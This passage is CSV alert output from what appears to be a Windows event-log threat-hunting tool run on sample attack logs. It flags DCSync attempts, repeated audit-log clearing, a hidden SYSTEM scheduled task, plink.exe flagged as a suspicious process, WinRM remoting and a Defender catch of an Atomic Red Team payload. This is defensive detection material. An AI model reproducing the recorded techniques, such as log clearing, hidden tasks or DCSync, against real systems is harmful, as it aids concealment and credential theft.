00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," 4688 1 0 13312 0 0x8020000000000000 18196 Security IEWIN7 S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser IEWIN7 0x13765 0x4f0 C:\Python27\python.exe %%1938 0x12c ",01566s-win16-ir.threebeesco.com,Security Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 2171289 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x38a14 ",IEWIN7,Security Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242605 Security DC1.insecurebank.local 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," 1102 0 4 104 0 0x4020000000000000 18195 Security IEWIN7 S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser IEWIN7 0x1371b ",IEWIN7,Security Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242604 Security DC1.insecurebank.local 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242603 Security DC1.insecurebank.local 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698," 4698 0 0 12804 0 0x8020000000000000 566836 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 Administrator EXAMPLE 0x17e2d2 \CYAlyNSS <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <CalendarTrigger> <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="LocalSystem"> <Exec> <Command>cmd.exe</Command> <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> </Exec> </Actions> </Task> ",PC01.example.corp,Security schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102," 1102 0 4 104 0 0x4020000000000000 432901 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x18a7875 ",WIN-77LTAPHIQ1R.example.corp,Security network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142," 5142 0 0 12808 0 0x8020000000000000 6273 Security PC04.example.corp S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser PC04 0x128a9 \\*\PRINT c:\windows\system32 ",PC04.example.corp,Security Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," 1102 0 4 104 0 0x4020000000000000 566821 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 administrator EXAMPLE 0x4fd77 ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," 1102 0 4 104 0 0x4020000000000000 6272 Security PC04.example.corp S-1-5-21-3583694148-1414552638-2922671848-1000 IEUser PC04 0x128a9 ",PC04.example.corp,Security Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," 1102 0 4 104 0 0x4020000000000000 565591 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 administrator EXAMPLE 0x4fd77 ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," 1102 0 4 104 0 0x4020000000000000 32950 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 Administrator EXAMPLE 0x35312 ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," 1102 0 4 104 0 0x4020000000000000 32853 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 Administrator EXAMPLE 0x35312 ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," 1102 0 4 104 0 0x4020000000000000 161471 Security MSEDGEWIN10 S-1-5-21-3461203602-4096304019-2269080069-1000 IEUser MSEDGEWIN10 0x52a7d ",MSEDGEWIN10,Security Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," 1102 0 4 104 0 0x4020000000000000 433307 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x18a7875 ",PC01.example.corp,Security Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688," 4688 1 0 13312 0 0x8020000000000000 227714 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x2ed80 0xcfc C:\Users\user01\Desktop\plink.exe %%1936 0xe60 ",PC01.example.corp,Security Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," 4688 1 0 13312 0 0x8020000000000000 227714 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1106 user01 EXAMPLE 0x2ed80 0xcfc C:\Users\user01\Desktop\plink.exe %%1936 0xe60 ",PC01.example.corp,Security Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102," 1102 0 4 104 0 0x4020000000000000 227693 Security PC01.example.corp S-1-5-21-1587066498-1489273250-1035260531-1108 admin01 EXAMPLE 0xaf855 ",PC01.example.corp,Security connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91," 91 0 4 9 0 0x4000000000000004 508 Microsoft-Windows-WinRM/Operational DC1.insecurebank.local 15005 shellId 68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000 ",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," 1117 0 4 0 0 0x8000000000000000 106 Microsoft-Windows-Windows Defender/Operational MSEDGEWIN10 %%827 4.18.1906.3 {8791B1FB-0FE7-412E-B084-524CB5A221F3} 2019-07-18T20:40:13.775Z 2147735426 Trojan:XML/Exeselrun.gen!A 5 Severe 8 Trojan https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 5 2 3 %%818 